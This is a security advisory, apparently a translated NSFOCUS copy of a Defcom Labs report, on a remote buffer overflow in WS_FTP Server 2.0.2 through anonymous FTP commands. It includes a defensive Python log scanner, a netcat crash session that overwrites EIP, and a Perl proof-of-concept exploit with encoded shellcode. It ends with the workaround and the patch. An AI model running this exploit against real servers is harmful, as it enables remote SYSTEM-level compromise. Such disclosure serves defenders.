WS-FTP Anonymous FTP Command Buffer Overflow Vulnerability

Published: 2001-07-25
Updated: 2001-07-31

Affected systems:

Ipswitch WS FTP Server 2.0.2
Ipswitch WS FTP Server 2.0.1
Ipswitch WS FTP Server 2.0
   - Microsoft Windows NT 4.0
   - Microsoft Windows 2000
Unaffected systems:

Ipswitch WS FTP Server 2.0.3
   - Microsoft Windows NT 4.0
   - Microsoft Windows 2000
Description:

BUGTRAQ ID: 3102

WS_FTP Server contains a buffer overflow vulnerability that affects the following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
When an argument longer than 478 bytes is supplied to any of these commands, a buffer overflow occurs and EIP is overwritten.
An attacker can remotely obtain SYSTEM privileges.

The vulnerability can only be exploited when anonymous FTP service is enabled; ordinary (authenticated) users cannot trigger the overflow.
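As an added example (not part of this advisory or of Defcom Labs' code), the following Python scans FTP command-log lines for the eleven affected commands carrying an argument longer than 478 bytes, and rates hits from anonymous sessions highest because those are the exploitable case. The log layout "<date> <time> <client-ip> <user> <CMD> [argument]" and the sample lines are assumed and constructed.

```python
import re
from collections import namedtuple

# Commands the advisory lists as reachable by the overflow.
AFFECTED_COMMANDS = {"DELE", "MDTM", "MLST", "MKD", "RMD", "RNFR",
                     "RNTO", "SIZE", "STAT", "XMKD", "XRMD"}
OVERFLOW_THRESHOLD = 478  # bytes; beyond this the advisory says EIP is overwritten
ANONYMOUS_USERS = {"ftp", "anonymous"}  # advisory: only anonymous sessions trigger it

# Assumed (constructed) log layout: "<date> <time> <client-ip> <user> <CMD> [argument]".
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>\d{1,3}(?:\.\d{1,3}){3}) (?P<user>\S+) "
    r"(?P<cmd>[A-Za-z]{3,4})(?: (?P<arg>.*))?$")
Record = namedtuple("Record", "ts src user cmd arg")

def parse_line(line):
    """Parse one log line into a Record, or None if it does not match the layout."""
    m = LOG_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return Record(m["ts"], m["src"], m["user"], m["cmd"].upper(), m["arg"] or "")

def classify(rec):
    """Return 'high', 'medium' or None for one parsed command."""
    if rec.cmd not in AFFECTED_COMMANDS:
        return None
    if len(rec.arg.encode("latin-1", "replace")) <= OVERFLOW_THRESHOLD:
        return None
    # Oversized argument to an affected command: the anonymous case is the
    # exploitable one; an authenticated one still deserves a look.
    return "high" if rec.user.lower() in ANONYMOUS_USERS else "medium"

def scan(lines):
    """Return a list of (severity, Record) alerts for an iterable of log lines."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            sev = classify(rec)
            if sev:
                alerts.append((sev, rec))
    return alerts

# Constructed sample lines, not real server logs.
SAMPLE_LOG = [
    "2001-06-19 14:00:21 10.0.0.5 ftp USER ftp",
    "2001-06-19 14:00:25 10.0.0.5 ftp DELE old.txt",
    "2001-06-19 14:00:30 10.0.0.5 ftp DELE " + "A" * 500,
    "2001-06-19 14:01:02 10.0.0.7 alice LIST " + "A" * 600,
    "2001-06-19 14:01:10 10.0.0.7 alice SIZE " + "B" * 479,
]
```

Running `scan(SAMPLE_LOG)` yields one high alert for the anonymous DELE and one medium alert for the authenticated SIZE; the oversized LIST is ignored because LIST is not in the affected set.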

<*Source: Defcom Labs Advisory def-2001-28 *>


Test method:

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!


C:\tools\web>nc -nvv 127.0.0.1 21
  (UNKNOWN) [127.0.0.1] 21 (?) open
  220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  220-Tue Jun 19 14:00:21 2001
  220-30 days remaining on evaluation.
  220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0
  eip=41414141 esp=0104df88 ebp=41414141 iopl=0         nv up ei pl zr na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246

Defcom Labs provided the following test code:

#!/usr/local/bin/perl
#########################################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
#########################################################################
$login="ftp";    #username
$pass="ftp";    #password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
    print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
    print "It creates a file named defcom.iyd in the c-root\n";
    print "(C)2001 andreas\@defcom.com\n";
       print "Usage: $0 <host>\n";
    print "Example: $0 127.0.0.1\n";
    exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

sleep(1);
$msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit = $sploit . "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit = $sploit . "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit = $sploit . "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";
$msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) .  "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
exit;



Recommendations:

Workaround:

Disable anonymous FTP service.

Vendor patch:

Ipswitch WS FTP Server 2.0.3 and later versions fix this issue. We recommend that users of this software
watch the vendor's home page for the latest version:

http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html



This vulnerability report was translated and compiled by NSFOCUS (绿盟科技); all rights reserved, no reproduction without permission.